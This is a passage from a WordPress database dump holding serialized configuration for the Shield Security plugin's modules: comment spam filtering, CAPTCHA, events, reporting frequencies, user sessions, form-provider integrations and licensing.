default\";}}i:4;a:5:{s:4:\"slug\";s:61:\"section_enable_plugin_feature_spam_comments_protection_filter\";s:5:\"title\";s:39:\"Enable Module: Comments SPAM Protection\";s:11:\"title_short\";s:14:\"Disable Module\";s:9:\"beacon_id\";i:257;s:7:\"summary\";a:2:{i:0;s:126:\"Purpose - The Comments Filter can block 100% of automated spam bots and also offer the option to analyse human-generated spam.\";i:1;s:60:\"Recommendation - Keep the Comments Filter feature turned on.\";}}i:5;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:15:{i:0;a:11:{s:3:\"key\";s:22:\"enable_comments_filter\";s:7:\"section\";s:61:\"section_enable_plugin_feature_spam_comments_protection_filter\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3z\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf04\";s:9:\"beacon_id\";i:257;s:4:\"name\";s:22:\"Enable SPAM Protection\";s:7:\"summary\";s:55:\"Enable (or Disable) The Comments SPAM Protection module\";s:11:\"description\";s:83:\"Un-Checking this option will completely disable the Comments SPAM Protection module\";}i:1;a:11:{s:3:\"key\";s:25:\"trusted_commenter_minimum\";s:7:\"section\";s:31:\"section_bot_comment_spam_common\";s:7:\"default\";i:1;s:3:\"min\";i:1;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/fu\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:152;s:4:\"name\";s:25:\"Trusted Commenter Minimum\";s:7:\"summary\";s:63:\"Minimum Number Of Approved Comments Before Commenter Is Trusted\";s:11:\"description\";s:117:\"Specify how many approved comments must exist before a commenter is trusted and their comments are no longer scanned.\";}i:2;a:11:{s:3:\"key\";s:18:\"trusted_user_roles\";s:7:\"section\";s:31:\"section_bot_comment_spam_common\";s:7:\"premium\";b:1;s:7:\"default\";a:5:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";i:2;s:6:\"author\";i:3;s:11:\"contributor\";i:4;s:10:\"subscriber\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/fu\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:152;s:4:\"name\";s:13:\"Trusted Users\";s:7:\"summary\";s:54:\"Don\'t Scan Comments For Users With The Following Roles\";s:11:\"description\";s:124:\"Shield doesn\'t normally scan comments from logged-in or registered users. Specify user roles here that shouldn\'t be scanned.\";}i:3;a:10:{s:3:\"key\";s:20:\"enable_antibot_check\";s:7:\"section\";s:42:\"section_bot_comment_spam_protection_filter\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/k1\";s:9:\"link_blog\";s:19:\"https://shsec.io/jo\";s:9:\"beacon_id\";i:427;s:4:\"name\";s:24:\"AntiBot Detection Engine\";s:7:\"summary\";s:41:\"Use Experimental AntiBot Detection Engine\";s:11:\"description\";s:68:\"Use Shield\'s AntiBot Detection Engine In-Place of GASP Bot checking.\";}i:4;a:11:{s:3:\"key\";s:32:\"comments_default_action_spam_bot\";s:7:\"section\";s:42:\"section_bot_comment_spam_protection_filter\";s:7:\"default\";s:4:\"spam\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:1:\"0\";s:4:\"text\";s:26:\"Move To Pending Moderation\";}i:1;a:2:{s:9:\"value_key\";s:4:\"spam\";s:4:\"text\";s:12:\"Move To SPAM\";}i:2;a:2:{s:9:\"value_key\";s:5:\"trash\";s:4:\"text\";s:13:\"Move To Trash\";}i:3;a:2:{s:9:\"value_key\";s:6:\"reject\";s:4:\"text\";s:18:\"Block And Redirect\";}}s:9:\"link_info\";s:19:\"https://shsec.io/6j\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:260;s:4:\"name\";s:11:\"SPAM Action\";s:7:\"summary\";s:53:\"How To Categorise Comments When Identified To Be SPAM\";s:11:\"description\";s:118:\"When a comment is detected as being SPAM from an automatic bot, the comment will be categorised based on this setting.\";}i:5;a:11:{s:3:\"key\";s:31:\"google_recaptcha_style_comments\";s:7:\"section\";s:42:\"section_bot_comment_spam_protection_filter\";s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:7:\"default\";s:4:\"text\";s:13:\"Default Style\";}i:2;a:2:{s:9:\"value_key\";s:5:\"light\";s:4:\"text\";s:11:\"Light Theme\";}i:3;a:2:{s:9:\"value_key\";s:4:\"dark\";s:4:\"text\";s:10:\"Dark Theme\";}i:4;a:2:{s:9:\"value_key\";s:9:\"invisible\";s:4:\"text\";s:9:\"Invisible\";}}s:9:\"link_info\";s:19:\"https://shsec.io/e4\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:269;s:4:\"name\";s:7:\"CAPTCHA\";s:7:\"summary\";s:47:\"Enable CAPTCHA To Protect Against SPAM Comments\";s:11:\"description\";s:107:\"You can choose the CAPTCHA display format that best suits your site, including the newer Invisible CAPTCHA.\";}i:6;a:10:{s:3:\"key\";s:31:\"enable_comments_gasp_protection\";s:7:\"section\";s:42:\"section_bot_comment_spam_protection_filter\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3n\";s:9:\"link_blog\";s:19:\"https://shsec.io/2n\";s:9:\"beacon_id\";i:401;s:4:\"name\";s:15:\"GASP Protection\";s:7:\"summary\";s:22:\"Block Bot Comment SPAM\";s:11:\"description\";s:121:\"Taking the lead from the original GASP plugin for WordPress, we have extended it to include advanced spam-bot protection.\";}i:7;a:10:{s:3:\"key\";s:33:\"enable_comments_human_spam_filter\";s:7:\"section\";s:25:\"section_human_spam_filter\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/57\";s:9:\"link_blog\";s:19:\"https://shsec.io/9w\";s:9:\"beacon_id\";i:262;s:4:\"name\";s:17:\"Human SPAM Filter\";s:7:\"summary\";s:48:\"Enable (or Disable) The Human SPAM Filter module\";s:11:\"description\";s:145:\"Scans the content of WordPress comments for keywords that are indicative of SPAM and marks the comment according to your preferred setting below.\";}i:8;a:8:{s:3:\"key\";s:34:\"comments_default_action_human_spam\";s:7:\"section\";s:25:\"section_human_spam_filter\";s:7:\"default\";s:1:\"0\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:1:\"0\";s:4:\"text\";s:26:\"Move To Pending Moderation\";}i:1;a:2:{s:9:\"value_key\";s:4:\"spam\";s:4:\"text\";s:12:\"Move To SPAM\";}i:2;a:2:{s:9:\"value_key\";s:5:\"trash\";s:4:\"text\";s:13:\"Move To Trash\";}i:3;a:2:{s:9:\"value_key\";s:6:\"reject\";s:4:\"text\";s:18:\"Block And Redirect\";}}s:4:\"name\";s:11:\"SPAM Action\";s:7:\"summary\";s:54:\"How To Categorise Comments When Identified To Be SPAM\'\";s:11:\"description\";s:119:\"When a comment is detected as being SPAM from a human commenter, the comment will be categorised based on this setting.\";}i:9;a:11:{s:3:\"key\";s:23:\"custom_message_checkbox\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/3p\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:403;s:4:\"name\";s:23:\"Custom Checkbox Message\";s:7:\"summary\";s:63:\"If you want a custom checkbox message, please provide this here\";s:11:\"description\";s:50:\"You can customise the message beside the checkbox.\";}i:10;a:11:{s:3:\"key\";s:20:\"custom_message_alert\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/3p\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:403;s:4:\"name\";s:20:\"Custom Alert Message\";s:7:\"summary\";s:60:\"If you want a custom alert message, please provide this here\";s:11:\"description\";s:101:\"This alert message is displayed when a visitor attempts to submit a comment without checking the box.\";}i:11;a:11:{s:3:\"key\";s:27:\"custom_message_comment_wait\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/3p\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:403;s:4:\"name\";s:19:\"Custom Wait Message\";s:7:\"summary\";s:74:\"If you want a custom submit-button wait message, please provide this here.\";s:11:\"description\";s:111:\"Where you see the \'%s\' this will be the number of seconds. You must ensure you include 1, and only 1, of these.\";}i:12;a:11:{s:3:\"key\";s:29:\"custom_message_comment_reload\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/3p\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:403;s:4:\"name\";s:21:\"Custom Reload Message\";s:7:\"summary\";s:90:\"If you want a custom message when the comment token has expired, please provide this here.\";s:11:\"description\";s:81:\"This message is displayed on the submit-button when the comment token is expired.\";}i:13;a:5:{s:3:\"key\";s:17:\"comments_cooldown\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"default\";i:10;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";}i:14;a:4:{s:3:\"key\";s:16:\"human_spam_items\";s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:5:\"array\";s:7:\"default\";a:6:{i:0;s:11:\"author_name\";i:1;s:12:\"author_email\";i:2;s:15:\"comment_content\";i:3;s:3:\"url\";i:4;s:10:\"ip_address\";i:5;s:10:\"user_agent\";}}}s:11:\"definitions\";a:3:{s:15:\"comments_expire\";i:1800;s:24:\"url_spam_blacklist_terms\";s:89:\"https://raw.githubusercontent.com/splorp/wordpress-comment-blacklist/master/blacklist.txt\";s:6:\"events\";a:5:{s:18:\"comment_spam_block\";a:3:{s:5:\"audit\";b:0;s:4:\"stat\";b:0;s:7:\"offense\";b:1;}s:18:\"spam_block_antibot\";a:0:{}s:14:\"spam_block_bot\";a:0:{}s:20:\"spam_block_recaptcha\";a:0:{}s:16:\"spam_block_human\";a:0:{}}}s:10:\"meta_modts\";i:1628268100;}','no'),(468222,'_site_transient_shield_mod_config_a11ed43e6f8c0c73b544f95d54fec314','a:6:{s:10:\"properties\";a:12:{s:4:\"slug\";s:6:\"events\";s:4:\"name\";s:6:\"Events\";s:21:\"show_module_menu_item\";b:0;s:11:\"storage_key\";s:6:\"events\";s:7:\"tagline\";s:37:\"Collection of plugin events and stats\";s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;s:16:\"tracking_exclude\";b:1;}s:5:\"wpcli\";a:1:{s:7:\"enabled\";b:0;}s:8:\"sections\";a:2:{i:0;a:5:{s:4:\"slug\";s:36:\"section_enable_plugin_feature_events\";s:7:\"primary\";b:1;s:5:\"title\";s:21:\"Enable Module: Events\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:70:\"Purpose - Helps you see at a glance how effective the plugin has been.\";i:1;s:51:\"Recommendation - Keep the Events feature turned on.\";}}i:1;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:1:{i:0;a:9:{s:3:\"key\";s:13:\"enable_events\";s:7:\"section\";s:36:\"section_enable_plugin_feature_events\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:13:\"Enable Events\";s:7:\"summary\";s:37:\"Enable (or Disable) The Events module\";s:11:\"description\";s:65:\"Un-Checking this option will completely disable the Events module\";}}s:11:\"definitions\";a:3:{s:10:\"db_classes\";a:1:{s:6:\"events\";s:65:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Events\\Handler\";}s:15:\"db_table_events\";a:2:{s:4:\"slug\";s:6:\"events\";s:11:\"cols_custom\";a:2:{s:5:\"event\";s:54:\"varchar(50) NOT NULL DEFAULT \'none\' COMMENT \'Event ID\'\";s:5:\"count\";s:51:\"int(11) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'Total\'\";}}s:17:\"events_table_name\";s:6:\"events\";}s:10:\"meta_modts\";i:1628268100;}','no'),(468223,'_site_transient_shield_mod_config_2bc2605d76db96d0ed3a050dea0907d9','a:7:{s:10:\"properties\";a:13:{s:4:\"slug\";s:9:\"reporting\";s:4:\"name\";s:9:\"Reporting\";s:11:\"storage_key\";s:9:\"reporting\";s:7:\"tagline\";s:16:\"Shield Reporting\";s:12:\"show_central\";b:1;s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:1;s:16:\"tracking_exclude\";b:1;}s:10:\"menu_items\";a:1:{i:0;a:2:{s:5:\"title\";s:12:\"Stats (beta)\";s:4:\"slug\";s:14:\"stats-redirect\";}}s:16:\"custom_redirects\";a:1:{i:0;a:3:{s:15:\"source_mod_page\";s:14:\"stats-redirect\";s:15:\"target_mod_page\";s:8:\"insights\";s:10:\"query_args\";a:1:{s:4:\"inav\";s:7:\"reports\";}}}s:8:\"sections\";a:3:{i:0;a:6:{s:4:\"slug\";s:15:\"section_timings\";s:7:\"primary\";b:1;s:5:\"title\";s:18:\"Report Frequencies\";s:11:\"title_short\";s:18:\"Report Frequencies\";s:9:\"beacon_id\";i:136;s:7:\"summary\";a:1:{i:0;s:105:\"Purpose - Choose the most appropriate frequency to receive alerts from Shield according to your schedule.\";}}i:1;a:5:{s:4:\"slug\";s:28:\"section_enable_mod_reporting\";s:5:\"title\";s:22:\"Enable Module: Reports\";s:11:\"title_short\";s:14:\"Disable Module\";s:9:\"beacon_id\";i:136;s:7:\"summary\";a:2:{i:0;s:70:\"Purpose - Helps you see at a glance how effective the plugin has been.\";i:1;s:54:\"Recommendation - Keep the Reporting feature turned on.\";}}i:2;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:3:{i:0;a:11:{s:3:\"key\";s:16:\"enable_reporting\";s:7:\"section\";s:28:\"section_enable_mod_reporting\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/hb\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:136;s:4:\"name\";s:16:\"Enable Reporting\";s:7:\"summary\";s:40:\"Enable (or Disable) The Reporting module\";s:11:\"description\";s:68:\"Un-Checking this option will completely disable the Reporting module\";}i:1;a:11:{s:3:\"key\";s:15:\"frequency_alert\";s:7:\"section\";s:15:\"section_timings\";s:4:\"type\";s:6:\"select\";s:7:\"default\";s:5:\"daily\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:6:\"hourly\";s:4:\"text\";s:6:\"Hourly\";}i:2;a:2:{s:9:\"value_key\";s:5:\"daily\";s:4:\"text\";s:5:\"Daily\";}i:3;a:2:{s:9:\"value_key\";s:6:\"weekly\";s:4:\"text\";s:6:\"Weekly\";}}s:9:\"link_info\";s:19:\"https://shsec.io/h9\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:233;s:4:\"name\";s:15:\"Alert Frequency\";s:7:\"summary\";s:45:\"How Often Should You Be Sent Important Alerts\";s:11:\"description\";s:86:\"Decide when you should be sent important and critical alerts about your site security.\";}i:2;a:11:{s:3:\"key\";s:14:\"frequency_info\";s:7:\"section\";s:15:\"section_timings\";s:4:\"type\";s:6:\"select\";s:7:\"default\";s:6:\"weekly\";s:13:\"value_options\";a:6:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:6:\"hourly\";s:4:\"text\";s:6:\"Hourly\";}i:2;a:2:{s:9:\"value_key\";s:5:\"daily\";s:4:\"text\";s:5:\"Daily\";}i:3;a:2:{s:9:\"value_key\";s:6:\"weekly\";s:4:\"text\";s:6:\"Weekly\";}i:4;a:2:{s:9:\"value_key\";s:8:\"biweekly\";s:4:\"text\";s:9:\"Bi-Weekly\";}i:5;a:2:{s:9:\"value_key\";s:7:\"monthly\";s:4:\"text\";s:7:\"Monthly\";}}s:9:\"link_info\";s:19:\"https://shsec.io/ha\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:232;s:4:\"name\";s:14:\"Info Frequency\";s:7:\"summary\";s:48:\"How Often Should You Be Sent Information Reports\";s:11:\"description\";s:93:\"Decide when you should be sent non-critical information and reports about your site security.\";}}s:11:\"definitions\";a:2:{s:10:\"db_classes\";a:1:{s:7:\"reports\";s:66:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Reports\\Handler\";}s:16:\"db_table_reports\";a:4:{s:4:\"slug\";s:7:\"reports\";s:10:\"autoexpire\";i:30;s:11:\"cols_custom\";a:3:{s:3:\"rid\";s:55:\"int(11) UNSIGNED NOT NULL DEFAULT 0 COMMENT \'Report ID\'\";s:4:\"type\";s:52:\"varchar(3) NOT NULL DEFAULT \'\' COMMENT \'Report Type\'\";s:9:\"frequency\";s:67:\"varchar(10) NOT NULL DEFAULT \'\' COMMENT \'Report Interval/Frequency\'\";}s:15:\"cols_timestamps\";a:2:{s:15:\"interval_end_at\";s:22:\"Reporting Interval End\";s:7:\"sent_at\";s:11:\"Report Sent\";}}}s:10:\"meta_modts\";i:1628268100;}','no'),(468224,'_site_transient_shield_mod_config_70e5d30ddb850aafaee6dc5037afaf3f','a:6:{s:10:\"properties\";a:14:{s:4:\"slug\";s:8:\"sessions\";s:4:\"name\";s:8:\"Sessions\";s:21:\"show_module_menu_item\";b:0;s:11:\"storage_key\";s:8:\"sessions\";s:7:\"tagline\";s:13:\"User Sessions\";s:12:\"auto_enabled\";b:1;s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:19:\"auto_load_processor\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:16:\"tracking_exclude\";b:1;}s:5:\"wpcli\";a:1:{s:7:\"enabled\";b:0;}s:8:\"sections\";a:2:{i:0;a:5:{s:4:\"slug\";s:38:\"section_enable_plugin_feature_sessions\";s:7:\"primary\";b:1;s:5:\"title\";s:23:\"Enable Module: Sessions\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:44:\"Purpose - Creates and Manages User Sessions.\";i:1;s:53:\"Recommendation - Keep the Sessions feature turned on.\";}}i:1;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:2:{i:0;a:9:{s:3:\"key\";s:15:\"enable_sessions\";s:7:\"section\";s:38:\"section_enable_plugin_feature_sessions\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Enable Sessions\";s:7:\"summary\";s:39:\"Enable (or Disable) The Sessions module\";s:11:\"description\";s:67:\"Un-Checking this option will completely disable the Sessions module\";}i:1;a:5:{s:3:\"key\";s:27:\"autoadd_sessions_started_at\";s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:7:\"integer\";s:12:\"transferable\";b:0;s:7:\"default\";i:0;}}s:11:\"definitions\";a:4:{s:10:\"db_classes\";a:1:{s:8:\"sessions\";s:66:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Session\\Handler\";}s:19:\"sessions_table_name\";s:8:\"sessions\";s:17:\"db_table_sessions\";a:3:{s:4:\"slug\";s:8:\"sessions\";s:11:\"cols_custom\";a:5:{s:10:\"session_id\";s:31:\"varchar(32) NOT NULL DEFAULT \'\'\";s:11:\"wp_username\";s:32:\"varchar(255) NOT NULL DEFAULT \'\'\";s:2:\"ip\";s:31:\"varchar(60) NOT NULL DEFAULT \'\'\";s:7:\"browser\";s:31:\"varchar(32) NOT NULL DEFAULT \'\'\";s:17:\"last_activity_uri\";s:24:\"text NOT NULL DEFAULT \'\'\";}s:15:\"cols_timestamps\";a:3:{s:12:\"logged_in_at\";s:15:\"Session Started\";s:16:\"last_activity_at\";s:12:\"Last Seen At\";s:11:\"secadmin_at\";s:28:\"Security Admin Authenticated\";}}s:6:\"events\";a:3:{s:13:\"session_start\";a:1:{s:5:\"audit\";b:0;}s:17:\"session_terminate\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:13:\"login_success\";a:3:{s:7:\"offense\";b:0;s:5:\"audit\";b:0;s:4:\"stat\";b:0;}}}s:10:\"meta_modts\";i:1628268100;}','no'),(468225,'_site_transient_shield_mod_config_bab7bd198f063e113dcaca381562402b','a:7:{s:4:\"slug\";s:12:\"integrations\";s:10:\"properties\";a:16:{s:4:\"slug\";s:12:\"integrations\";s:11:\"storage_key\";s:12:\"integrations\";s:4:\"name\";s:12:\"Integrations\";s:10:\"menu_title\";s:12:\"Integrations\";s:12:\"sidebar_name\";s:12:\"Integrations\";s:19:\"show_module_options\";b:1;s:21:\"show_module_menu_item\";b:0;s:12:\"auto_enabled\";b:0;s:12:\"show_central\";b:1;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:12:\"run_if_wpcli\";b:1;s:19:\"run_if_verified_bot\";b:1;s:14:\"skip_processor\";b:0;s:16:\"tracking_exclude\";b:0;}s:5:\"wpcli\";a:1:{s:7:\"enabled\";b:1;}s:8:\"sections\";a:4:{i:0;a:5:{s:4:\"slug\";s:20:\"section_integrations\";s:7:\"primary\";b:1;s:5:\"title\";s:12:\"Integrations\";s:11:\"title_short\";s:12:\"Integrations\";s:9:\"beacon_id\";i:404;}i:1;a:4:{s:4:\"slug\";s:12:\"section_spam\";s:5:\"title\";s:14:\"SPAM Detection\";s:11:\"title_short\";s:14:\"SPAM Detection\";s:9:\"beacon_id\";i:138;}i:2;a:4:{s:4:\"slug\";s:18:\"section_user_forms\";s:5:\"title\";s:24:\"User Forms Bot Detection\";s:11:\"title_short\";s:24:\"User Forms Bot Detection\";s:9:\"beacon_id\";i:239;}i:3;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:3:{i:0;a:10:{s:3:\"key\";s:13:\"enable_mainwp\";s:7:\"section\";s:20:\"section_integrations\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/ir\";s:9:\"link_blog\";s:19:\"https://shsec.io/ke\";s:9:\"beacon_id\";i:404;s:4:\"name\";s:13:\"Enable MainWP\";s:7:\"summary\";s:36:\"Enable The Built-In MainWP Extension\";s:11:\"description\";s:86:\"This option will enable Shield\'s built-in MainWP extension for both server and client.\";}i:1;a:13:{s:3:\"key\";s:19:\"form_spam_providers\";s:7:\"section\";s:12:\"section_spam\";s:7:\"premium\";b:1;s:8:\"advanced\";b:1;s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:0:{}s:13:\"value_options\";a:13:{i:0;a:2:{s:9:\"value_key\";s:12:\"contactform7\";s:4:\"text\";s:14:\"Contact Form 7\";}i:1;a:2:{s:9:\"value_key\";s:12:\"elementorpro\";s:4:\"text\";s:13:\"Elementor Pro\";}i:2;a:2:{s:9:\"value_key\";s:11:\"fluentforms\";s:4:\"text\";s:12:\"Fluent Forms\";}i:3;a:2:{s:9:\"value_key\";s:15:\"formidableforms\";s:4:\"text\";s:16:\"Formidable Forms\";}i:4;a:2:{s:9:\"value_key\";s:10:\"forminator\";s:4:\"text\";s:10:\"Forminator\";}i:5;a:2:{s:9:\"value_key\";s:12:\"gravityforms\";s:4:\"text\";s:13:\"Gravity Forms\";}i:6;a:2:{s:9:\"value_key\";s:10:\"groundhogg\";s:4:\"text\";s:10:\"Groundhogg\";}i:7;a:2:{s:9:\"value_key\";s:9:\"kaliforms\";s:4:\"text\";s:10:\"Kali Forms\";}i:8;a:2:{s:9:\"value_key\";s:10:\"ninjaforms\";s:4:\"text\";s:11:\"Ninja Forms\";}i:9;a:2:{s:9:\"value_key\";s:10:\"superforms\";s:4:\"text\";s:11:\"Super Forms\";}i:10;a:2:{s:9:\"value_key\";s:12:\"supportcandy\";s:4:\"text\";s:13:\"Support Candy\";}i:11;a:2:{s:9:\"value_key\";s:6:\"wpforo\";s:4:\"text\";s:6:\"wpForo\";}i:12;a:2:{s:9:\"value_key\";s:7:\"wpforms\";s:4:\"text\";s:7:\"WPForms\";}}s:9:\"link_info\";s:19:\"https://shsec.io/k2\";s:9:\"link_blog\";s:19:\"https://shsec.io/k3\";s:9:\"beacon_id\";i:138;s:4:\"name\";s:18:\"SPAM Form Checking\";s:7:\"summary\";s:57:\"Select The Form Providers That Should Be Checked For SPAM\";s:11:\"description\";s:58:\"Select The Form Providers That Should Be Checked For SPAM.\";}i:2;a:13:{s:3:\"key\";s:19:\"user_form_providers\";s:7:\"section\";s:18:\"section_user_forms\";s:7:\"premium\";b:1;s:8:\"advanced\";b:1;s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:1:{i:0;s:9:\"wordpress\";}s:13:\"value_options\";a:11:{i:0;a:2:{s:9:\"value_key\";s:10:\"buddypress\";s:4:\"text\";s:10:\"BuddyPress\";}i:1;a:2:{s:9:\"value_key\";s:20:\"easydigitaldownloads\";s:4:\"text\";s:22:\"Easy Digital Downloads\";}i:2;a:2:{s:9:\"value_key\";s:10:\"learnpress\";s:4:\"text\";s:10:\"LearnPress\";}i:3;a:2:{s:9:\"value_key\";s:9:\"lifterlms\";s:4:\"text\";s:9:\"LifterLMS\";}i:4;a:2:{s:9:\"value_key\";s:11:\"memberpress\";s:4:\"text\";s:11:\"MemberPress\";}i:5;a:2:{s:9:\"value_key\";s:23:\"paidmembersubscriptions\";s:4:\"text\";s:25:\"Paid Member Subscriptions\";}i:6;a:2:{s:9:\"value_key\";s:14:\"profilebuilder\";s:4:\"text\";s:15:\"Profile Builder\";}i:7;a:2:{s:9:\"value_key\";s:14:\"ultimatemember\";s:4:\"text\";s:15:\"Ultimate Member\";}i:8;a:2:{s:9:\"value_key\";s:11:\"woocommerce\";s:4:\"text\";s:11:\"WooCommerce\";}i:9;a:2:{s:9:\"value_key\";s:9:\"wordpress\";s:4:\"text\";s:9:\"WordPress\";}i:10;a:2:{s:9:\"value_key\";s:9:\"wpmembers\";s:4:\"text\";s:10:\"WP Members\";}}s:9:\"link_info\";s:19:\"https://shsec.io/k4\";s:9:\"link_blog\";s:19:\"https://shsec.io/k3\";s:9:\"beacon_id\";i:239;s:4:\"name\";s:18:\"User Form Checking\";s:7:\"summary\";s:87:\"Select The User Form Providers That Should Be Checked For SPAM Registrations and Logins\";s:11:\"description\";s:87:\"Select The User Form Providers That Should Be Checked For SPAM Registrations and Logins\";}}s:11:\"definitions\";a:1:{s:6:\"events\";a:4:{s:14:\"spam_form_pass\";a:3:{s:4:\"stat\";b:1;s:5:\"audit\";b:1;s:7:\"offense\";b:0;}s:14:\"spam_form_fail\";a:3:{s:4:\"stat\";b:1;s:5:\"audit\";b:1;s:7:\"offense\";b:0;}s:18:\"user_form_bot_pass\";a:3:{s:4:\"stat\";b:1;s:5:\"audit\";b:1;s:7:\"offense\";b:0;}s:18:\"user_form_bot_fail\";a:3:{s:4:\"stat\";b:1;s:5:\"audit\";b:1;s:7:\"offense\";b:1;}}}s:10:\"meta_modts\";i:1628268100;}','no'),(468226,'_site_transient_shield_mod_config_e76004361d96930adefd86d99ce6c323','a:9:{s:4:\"slug\";s:7:\"license\";s:10:\"properties\";a:14:{s:4:\"slug\";s:7:\"license\";s:4:\"name\";s:12:\"Pro Security\";s:10:\"menu_title\";s:0:\"\";s:21:\"show_module_menu_item\";b:0;s:19:\"highlight_menu_item\";b:1;s:7:\"tagline\";s:44:\"The Best In WordPress Security, Only Better.\";s:12:\"auto_enabled\";b:1;s:11:\"storage_key\";s:7:\"license\";s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;}s:13:\"admin_notices\";a:1:{s:19:\"wphashes-token-fail\";a:6:{s:2:\"id\";s:19:\"wphashes-token-fail\";s:8:\"schedule\";s:10:\"conditions\";s:11:\"valid_admin\";b:1;s:16:\"plugin_page_only\";b:1;s:11:\"can_dismiss\";b:0;s:4:\"type\";s:5:\"error\";}}s:10:\"menu_items\";a:1:{i:0;a:3:{s:5:\"title\";s:7:\"Go 